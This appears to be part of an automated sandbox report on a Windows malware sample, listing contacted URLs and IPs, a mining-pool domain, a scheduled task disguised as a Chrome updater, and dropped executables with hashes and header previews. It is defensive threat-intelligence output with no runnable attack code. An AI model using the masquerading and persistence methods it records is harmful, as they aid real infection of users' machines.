                                                                          http://x1.c.lencr.org/0zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            http://x1.i.lencr.org/0zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              http://c.pki.goog/r/r1.crl0zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://contoso.com/powershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://github.com/Pester/PesterXzupowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          http://icanhazip.comzufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://aka.ms/pscore68powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namezufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://gemini.google.com/app?q=zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    89.23.100.233
                                                                                                    unknownRussian Federation
                                                                                                    48687MAXITEL-ASRUfalse
                                                                                                    104.16.184.241
                                                                                                    icanhazip.comUnited States
                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                    84.32.84.151
                                                                                                    utka.xyzLithuania
                                                                                                    33922NTT-LT-ASLTtrue
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1530000
                                                                                                    Start date and time:2024-10-09 16:27:49 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 15m 4s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                    Run name:Suspected VM Detection
                                                                                                    Number of analysed new started processes analysed:41
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:18
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:zufmUwylvo.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.mine.winEXE@72/47@3/3
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 85.7%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 96%
                                                                                                    • Number of executed functions: 75
                                                                                                    • Number of non-executed functions: 194
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): Conhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, pool.hashvault.pro, nexusrules.officeapps.live.com, pastebin.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 8508 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: zufmUwylvo.exe
                                                                                                    TimeTypeDescription
                                                                                                    10:29:54API Interceptor1x Sleep call for process: zxcvbnmasd.exe modified
                                                                                                    10:29:55API Interceptor51x Sleep call for process: powershell.exe modified
                                                                                                    10:30:05API Interceptor99x Sleep call for process: zufmUwylvo.exe modified
                                                                                                    10:30:08API Interceptor1x Sleep call for process: updater.exe modified
                                                                                                    10:30:30API Interceptor243936x Sleep call for process: winlogon.exe modified
                                                                                                    10:30:31API Interceptor250234x Sleep call for process: lsass.exe modified
                                                                                                    10:30:31API Interceptor1323039x Sleep call for process: svchost.exe modified
                                                                                                    10:30:35API Interceptor191052x Sleep call for process: dwm.exe modified
                                                                                                    10:30:38API Interceptor136574x Sleep call for process: IntelCpHDCPSvc.exe modified
                                                                                                    10:30:42API Interceptor134836x Sleep call for process: IntelCpHeciSvc.exe modified
                                                                                                    10:30:43API Interceptor73356x Sleep call for process: igfxCUIService.exe modified
                                                                                                    16:30:01Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20970496
                                                                                                    Entropy (8bit):7.80864463332949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:mE0t6YZQ+hEO1CGk9rNVdXlTvr6EaYOHLfwS1hQeJpsQ:mttRQSYGk9rhh6aQfwQhQ
                                                                                                    MD5:413E4E7BC129E8165D1FFD2B1AE5DB04
                                                                                                    SHA1:1EA09F97D200319F1582AEB8F4084D80B0D61DFA
                                                                                                    SHA-256:B388D2B53453ADD11982A0E5B86EE01BBAF318EE77483300731D2202CE906146
                                                                                                    SHA-512:FB37421F14D673587DF501051C1DE9E36C4DF07B5871AF391E71A6269E5E42BCE70CC7841C6E55D0383871248A4DC520C9DEB1B9E4CFAB4C86BB6C1C21F89DEE
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Reputation:unknown
                                                                                                    Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f........../....&.....\[..&..R.]........@..............................@.....R.@... ... ..............................................4^.<.....@..... .@..;..............................................(....................... ............................text... ...........................`..`.data....,Y.........................@....rdata...>....Z.....................@..@.pdata.......0[.....................@..@.xdata..@....P[.....................@..@.bss.....%...`[..........................idata..4.....[.....................@....CRT....`.....[.....................@....tls..........[.....................@....yuZ..........[.....................@..@.e;T....N.....[..................... ..`."Ki....X...........................@.....>f......?.......?.................`..h.rsrc.........@.......?.............@..@................................................
                                                                                                    Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14544
                                                                                                    Entropy (8bit):6.2660301556221185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                    Reputation:unknown
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1588
                                                                                                    Entropy (8bit):5.354257575749257
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MxHK81qHG6LCYHKGroPtHTyehAHKKtHjJHUHK8O:iq8wm8CYqGroPtzLeqKt10q8O
                                                                                                    MD5:2A1BF5624EA172E038D1D1C24A953C42
                                                                                                    SHA1:52DC46F3119F912CA24C5F099C45D83FFA1BF827
                                                                                                    SHA-256:7B5903AB75F339D105660606864080270038A0E1F3387361869A6320BC2E080C
                                                                                                    SHA-512:C663CD2292854B6BB9652CD409E54DBC1872252C1CEB85A15C6C00836579A651897AAAC494BAF1488F90BA15705BB2161DD51C7E1806796E971966E3ACA89F95
                                                                                                    Malicious:true
                                                                                                    Reputation:unknown
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\372e9962a41f186f070f1cb9f93273ee\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\d4da288bf6ac86ce3921b8db5eaed5be\System.Drawing.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\dbf675a2e7564fd29ec8b82b29a1a2fe\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\053d057c90af827d0929a6aba7feabcf\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):150528
                                                                                                    Entropy (8bit):5.769203996328619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
                                                                                                    MD5:658AC2968AC81EADBE165CFD2A770C34
                                                                                                    SHA1:39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
                                                                                                    SHA-256:4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                                                                                                    SHA-512:CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                                                                    Reputation:unknown
                                                                                                    Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    File Type:SQLite 3.x database, user version 77, last written using SQLite version 3045002, page size 32768, writer version 2, read version 2, file counter 3, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5242880
                                                                                                    Entropy (8bit):0.04195199897834991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:alcnAVh3MQsX2Ptp1wbKevO6M96nSPhR3fFaA6IMiBJV:alcnAPdsX2PtpCuXj6GX3cASu
                                                                                                    MD5:4220F8B5379D9A1CB29D88395F5080E8
                                                                                                    SHA1:731D28CB85F7C1C9DBA95C4A4E4B7BA7930268A4
                                                                                                    SHA-256:02D4577FECBAAE00E7A2C867F88A694F168A98FCF3153DE39108E1E0669D5401
                                                                                                    SHA-512:3B4205605B32BC182347EEF784C30E86760C902F711B7936854398FFA8599C1A86C462D7CE779AA83EE40C43306E650E92285CAE49D84B02DDDFEAE32D9563CA
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:SQLite format 3......@ ...................&...................M..................................v.....-a>.~...|0{.{Zz.z.y.y.y.x.w.v.vvu.t.u.s.r.sAr0q.q.p.p.o@o.n.nLmrn.lHk.j{i.ijfEe.d.c.d.c@b.b'a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    File Type:SQLite 3.x database, user version 13, last written using SQLite version 3045002, page size 32768, writer version 2, read version 2, file counter 4, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                                                                                    Category:dropped
                                                                                                    Size (bytes):524288
                                                                                                    Entropy (8bit):0.027515372941387128
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:D43S232mNVpP965RayKN0MG/lTUlRt6wWUlkcObl:DoS6rh9WTKlRswRlkf
                                                                                                    MD5:21C347A9181FE59AEAE85D756BA9354F
                                                                                                    SHA1:E774CBE8A1F814DE978A7071A31EDCBB6E08663E
                                                                                                    SHA-256:1A227EBBCD4D6AD950DBBD94142CAB32E8998E1B8812E6CCFE1BCAA3C5F8673A
                                                                                                    SHA-512:B950CEB3FDA3B72FF2807878633DBDCA087990252B957F410083C3F1A1C0CF4D9EACDA2294C385293A759469FAEAE1B834A9973BA3B35108A3F9ACB9527FFD0B
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
                                                                                                    Preview:SQLite format 3......@ ..........................................................................v......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20970496
                                                                                                    Entropy (8bit):7.80864463332949
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:mE0t6YZQ+hEO1CGk9rNVdXlTvr6EaYOHLfwS1hQeJpsQ:mttRQSYGk9rhh6aQfwQhQ
                                                                                                    MD5:413E4E7BC129E8165D1FFD2B1AE5DB04
                                                                                                    SHA1:1EA09F97D200319F1582AEB8F4084D80B0D61DFA
                                                                                                    SHA-256:B388D2B53453ADD11982A0E5B86EE01BBAF318EE77483300731D2202CE906146
                                                                                                    SHA-512:FB37421F14D673587DF501051C1DE9E36C4DF07B5871AF391E71A6269E5E42BCE70CC7841C6E55D0383871248A4DC520C9DEB1B9E4CFAB4C86BB6C1C21F89DEE
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                                    Reputation:unknown
                                                                                                    Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f........../....&.....\[..&..R.]........@..............................@.....R.@... ... ..............................................4^.<.....@..... .@..;..............................................(....................... ............................text... ...........................`..`.data....,Y.........................@....rdata...>....Z.....................@..@.pdata.......0[.....................@..@.xdata..@....P[.....................@..@.bss.....%...`[..........................idata..4.....[.....................@....CRT....`.....[.....................@....tls..........[.....................@....yuZ..........[.....................@..@.e;T....N.....[..................... ..`."Ki....X...........................@.....>f......?.......?.................`..h.rsrc.........@.......?.............@..@................................................
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):4680
                                                                                                    Entropy (8bit):3.7114336397693255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:pYMguQII4iw6h4aGdinipV9ll7UY5HAmzQ+:9A4A/xne7HO+
                                                                                                    MD5:F87A9A2A3587DA7AA56390C7445929FD
                                                                                                    SHA1:AEEA03A63DE4AB25617734539505560D659C8DA9
                                                                                                    SHA-256:D238D326BEE7205CA8F242104AA7E8DE449EB15030097656D810ABB9142FEDA2
                                                                                                    SHA-512:329B5AC778BA44190606EA71F54407D0344E6B9E3E4B283DAA3F26B1D2A8F7FAED103D23E7ABDA05586D1FC4F0F338AD9AD3FBD7E6A4E1B5F9B6D15E0C19C842
                                                                                                    Malicious:false
                                                                                                    Reputation:unknown
